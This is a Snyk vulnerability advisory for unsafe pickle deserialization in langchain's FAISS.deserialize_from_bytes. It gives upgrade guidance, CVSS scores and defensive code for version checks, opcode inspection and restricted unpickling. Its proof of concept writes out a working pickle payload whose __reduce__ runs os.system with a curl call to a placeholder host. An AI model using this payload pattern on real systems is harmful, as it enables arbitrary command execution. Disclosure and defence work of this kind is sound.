Deserialization of Untrusted Data Affecting langchain package, versions [,0.2.10)


Severity

Medium

CVSS assessment made by Snyk's Security Team

Threat Intelligence

  • Exploit Maturity: Proof of concept
  • EPSS: 0.04% (11th percentile)

  • Snyk ID SNYK-PYTHON-LANGCHAIN-8023176
  • published 18 Sep 2024
  • disclosed 17 Sep 2024
  • credit Panda

How to fix?

Upgrade langchain to version 0.2.10 or higher.
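
To confirm whether an environment needs the upgrade, the installed version can be compared against the fixed release. The following is a minimal sketch, not an official Snyk or LangChain tool: the helper names `release_tuple` and `is_affected` are hypothetical, and the comparison looks only at the leading numeric components of the version string, ignoring any pre-release or local suffix.

```python
import re
from importlib import metadata

# First fixed release according to this advisory.
FIXED_IN = (0, 2, 10)


def release_tuple(version: str) -> tuple:
    """Return the leading numeric components, e.g. '0.2.9' -> (0, 2, 9)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(version: str) -> bool:
    """True if the version falls inside the affected range [,0.2.10)."""
    return release_tuple(version) < FIXED_IN


if __name__ == "__main__":
    try:
        installed = metadata.version("langchain")
    except metadata.PackageNotFoundError:
        print("langchain is not installed in this environment")
    else:
        status = "affected" if is_affected(installed) else "not affected"
        print(f"langchain {installed}: {status}")
```

For anything beyond a quick check, a full version parser such as the one in the `packaging` library handles pre-release and post-release suffixes more carefully than this sketch does.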

Overview

langchain is a package for building applications with LLMs through composability.

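Affected versions of this package are vulnerable to Deserialization of Untrusted Data through the FAISS.deserialize_from_bytes function. An attacker who controls the serialized bytes can execute arbitrary commands, for example by supplying a pickle payload whose __reduce__ method returns os.system together with a command string, as in the PoC.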

Note:

Exploiting this vulnerability requires that the user actively accept untrusted input from another source.

PoC

Serialized object:

import pickle
import os
import base64

class Test(object):
    def __init__(self):
        self.a = 1

    # pickle records the callable and arguments returned here;
    # they are invoked when the payload is later unpickled.
    def __reduce__(self):
        return (os.system, ('curl http://example.com/test',))

if __name__ == '__main__':
    tmp = Test()
    data = pickle.dumps(tmp)
    print(base64.b64encode(data))

Deserialization of the payload:

import base64
from langchain_community.embeddings.huggingface import HuggingFaceEmbeddings
from langchain_community.vectorstores import FAISS

embeddings = HuggingFaceEmbeddings(model_name="all-MiniLM-L6-v2")
# Replace the placeholder with the base64 output of the script above.
db = FAISS.deserialize_from_bytes(
    embeddings=embeddings,
    serialized=base64.b64decode(b'This is the serialized data after base64'),
)
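
A payload like the one in the PoC can be examined without running it, because the standard library's pickletools module walks the opcode stream without executing anything. The sketch below is illustrative only: the `suspicious_opcodes` helper, the `Payload` class, and the choice of opcodes to flag are assumptions made for this example, and the `echo` command stands in for the PoC's `curl` call. It is an inspection aid, not a filter, since legitimate pickles of class instances use the same opcodes.

```python
import os
import pickle
import pickletools

# Opcodes that import a global or call/instantiate something during loading.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def suspicious_opcodes(data: bytes) -> set:
    """Return the flagged opcode names present in a pickle, without loading it."""
    return {opcode.name for opcode, _arg, _pos in pickletools.genops(data)} & SUSPICIOUS


class Payload:
    # Same shape as the PoC class; pickle.dumps only records the callable
    # and its arguments, so nothing is executed in this script.
    def __reduce__(self):
        return (os.system, ("echo never executed here",))


malicious = pickle.dumps(Payload())
benign = pickle.dumps({"a": 1})

print("payload:", sorted(suspicious_opcodes(malicious)))
print("plain dict:", sorted(suspicious_opcodes(benign)))
```

The payload's opcode stream contains a global lookup followed by REDUCE, which is the step that would call os.system on load. The plain dictionary needs neither.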

Details

Serialization is the process of converting an object into a sequence of bytes that can be persisted to disk or a database, or sent over a stream. The reverse process, creating an object from a sequence of bytes, is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (storing the object state in a file or a database). It is an integral part of popular protocols such as Remote Method Invocation (RMI), Java Management Extensions (JMX), Java Message Service (JMS), Action Message Format (AMF), and JavaServer Faces (JSF) ViewState.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.
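
In Python, one general way to limit what a pickle can do is the "restricting globals" pattern from the pickle documentation: subclass pickle.Unpickler and override find_class so that no module-level callable can be resolved. The sketch below illustrates that generic technique under stated assumptions. It is not the fix shipped in langchain 0.2.10, and it is not a drop-in replacement for FAISS.deserialize_from_bytes, whose data legitimately contains class instances. The names `NoGlobalsUnpickler`, `safe_loads`, and `Payload` are hypothetical.

```python
import io
import os
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup (classes, functions)."""

    def find_class(self, module, name):
        # Called before any REDUCE step can run, so the callable is never obtained.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Load a pickle that may only contain built-in containers and scalars."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


class Payload:
    # Same shape as the PoC class, with a harmless stand-in command.
    def __reduce__(self):
        return (os.system, ("echo never executed here",))


print(safe_loads(pickle.dumps({"a": [1, 2]})))

try:
    safe_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

Plain containers load normally, while the payload is rejected at the point where the unpickler tries to resolve os.system. Where the data format is under the application's control, a format that cannot express code references, such as JSON, avoids the problem altogether.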

CVSS Scores

version 4.0

Snyk (recommended): 4.4 medium
  • Attack Vector (AV): Physical
  • Attack Complexity (AC): Low
  • Attack Requirements (AT): Present
  • Privileges Required (PR): Low
  • User Interaction (UI): Active
  • Confidentiality (VC): High
  • Integrity (VI): Low
  • Availability (VA): Low
  • Confidentiality (SC): None
  • Integrity (SI): None
  • Availability (SA): None
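
The metric values listed above can be written compactly as a CVSS v4.0 vector string, which is the form most scanners and ticketing tools exchange. The sketch below only assembles that string from the listed values using the standard v4.0 abbreviations. It does not compute the 4.4 score, and the names `METRICS` and `vector_string` are hypothetical.

```python
# Metric abbreviations and single-letter values in CVSS v4.0 base-metric order,
# transcribed from the list in this advisory.
METRICS = [
    ("AV", "P"),  # Attack Vector: Physical
    ("AC", "L"),  # Attack Complexity: Low
    ("AT", "P"),  # Attack Requirements: Present
    ("PR", "L"),  # Privileges Required: Low
    ("UI", "A"),  # User Interaction: Active
    ("VC", "H"),  # Vulnerable system Confidentiality: High
    ("VI", "L"),  # Vulnerable system Integrity: Low
    ("VA", "L"),  # Vulnerable system Availability: Low
    ("SC", "N"),  # Subsequent system Confidentiality: None
    ("SI", "N"),  # Subsequent system Integrity: None
    ("SA", "N"),  # Subsequent system Availability: None
]


def vector_string(metrics) -> str:
    """Join metric/value pairs into a CVSS v4.0 vector string."""
    return "CVSS:4.0/" + "/".join(f"{name}:{value}" for name, value in metrics)


vector = vector_string(METRICS)
print(vector)
```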